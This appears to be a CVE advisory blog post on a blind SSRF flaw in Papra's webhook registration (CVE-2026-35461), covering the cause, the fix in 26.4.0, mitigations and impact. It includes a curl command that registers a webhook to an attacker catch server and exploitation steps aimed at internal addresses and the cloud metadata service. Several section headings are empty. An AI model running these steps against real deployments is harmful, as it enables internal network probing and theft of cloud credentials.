Listen to this Post
The vulnerability in Papra’s webhook system, identified as CVE-2026-35461, is a classic case of a Blind Server-Side Request Forgery (SSRF) arising from insufficient validation of user-supplied URLs. Prior to version 26.4.0, the application allowed any authenticated user to register an arbitrary URL as a webhook endpoint without any checks on the destination’s safety. The core issue is that when a document event occurs, the Papra server automatically makes an outbound HTTP POST request to the registered URL, blindly accepting any destination, including those that are private or reserved.
This becomes dangerous because an attacker can set the webhook to a URL that points to an internal service, such as `http://localhost:8080/admin`, `http://10.0.0.1/secret`, or, in a cloud environment, the instance metadata service at http://169.254.169.254/latest/meta-data/`. The server, operating from within the network, will then act as a proxy, sending a request to that internal address. The response from the internal service is not returned to the attacker (hence "Blind" SSRF), but the mere fact that a request was made can expose sensitive information or be used to probe the internal network’s structure. This allows an attacker to bypass traditional firewall rules and access resources that should be completely isolated from the public internet.Immediate
The attack vector is straightforward: an attacker needs only an authenticated account on the platform. They can then use the standard API or interface to create a new webhook, specifying a malicious internal target as the URL. From that point forward, every document creation or update event will trigger the server to make a request to that internal address. While the attacker cannot see the response, they can infer information from server-side errors (e.g., a timeout vs. a connection refused) or potentially cause state changes if the internal service accepts unauthenticated POST requests. The primary fix, implemented in version 26.4.0, is to add a validation step that checks the webhook URL against a blocklist of private and reserved IP addresses (e.g., localhost, link-local, and RFC-1918 ranges), preventing these requests from ever being made.
<h2 style="color: blue;">DailyCVE Form:</h2>
Platform: `Papra`
Version: `< 26.4.0`
Vulnerability: `Blind SSRF`
Severity: `Medium`
Date: `2026-04-07`
<h2 style="color: blue;">Prediction:</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">CVE Query:</h2>
Check the version of a running Papra instance via the API curl -s https://your-papra-instance.com/api/health | jq '.version' Search for exploitable deployments using a public search engine (theoretical) "Papra" "webhook" "version"
<h2 style="color: blue;">Confirmation Payload:</h2>
Attempt to register a webhook pointing to a local service (e.g., a netcat listener)
This will confirm if the server makes the outbound request.
curl -X POST https://your-papra-instance.com/api/organizations/ORG_ID/webhooks \
-H "Authorization: Bearer YOUR_API_KEY" \
-H "Content-Type: application/json" \
-d '{
"name": "SSRF Test",
"url": "http://your-catch-server.com:8080/test",
"events": ["document:created"]
}'
Then trigger the webhook by uploading a document.
<h2 style="color: blue;">Exploit:</h2>
<h2 style="color: blue;">The exploitation process is as follows:</h2>
1. Identify Target: Find a vulnerable Papra instance (version < 26.4.0).
2. Authenticate: Obtain or create a user account on the platform.
3. Craft Malicious Webhook: Using the API or UI, register a new webhook. Instead of a legitimate external endpoint, the attacker provides a URL pointing to a private IP or hostname (e.g., `http://192.168.1.1/config`, `http://localhost:8080`, http://169.254.169.254/latest/user-data`).
4. Trigger Request: The attacker triggers an event that causes the webhook to fire. The simplest way is often to create a new document within Papra, which sends a POST request to the malicious URL.
5. Observe Outcome: The attacker may not see the response, but can use other means to determine if the request succeeded, such as:
Monitoring logs on the attacker's own server for connection attempts.
Observing differences in the server's behavior (e.g., a delay or specific error message indicating a connection was made to a closed port vs. an open one).
If a cloud metadata service is reachable, the attacker could theoretically cause the server to send an API request to a cloud provider to, for example, retrieve temporary credentials, though exfiltration of that response is blind.
Protection:
The primary protection is to upgrade to Papra version 26.4.0 or later, which implements comprehensive SSRF protection for webhook URLs. If an immediate upgrade is not possible, implement a strict allowlist of valid callback domains and enforce input validation to block any URL containing localhost, link-local, or RFC-1918 IP addresses. As a temporary emergency measure, disable the ability for non-administrative users to register or modify webhooks. For the most robust defense, network-level controls should also be considered, such as configuring a forward proxy to restrict outbound HTTP requests from the application server, preventing it from reaching internal or metadata IP ranges directly.
Impact
A successful exploit allows an authenticated attacker to use the Papra server as a pivot point to:
Probe Internal Network: Map out internal services by scanning common ports (e.g., 22, 80, 443, 3306) and observing which respond.
Access Cloud Metadata: In cloud environments (AWS, GCP, Azure), reach the instance metadata service (169.254.169.254) to potentially retrieve sensitive information like IAM roles, user-data scripts, or temporary credentials.
Bypass Firewalls: Access internal services that are not intended to be exposed to the internet, exploiting trust relationships.
Cause State Changes: If the internal service accepts unauthenticated POST requests, the attacker could trigger actions on it, such as creating a new admin user, deleting data, or restarting services.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
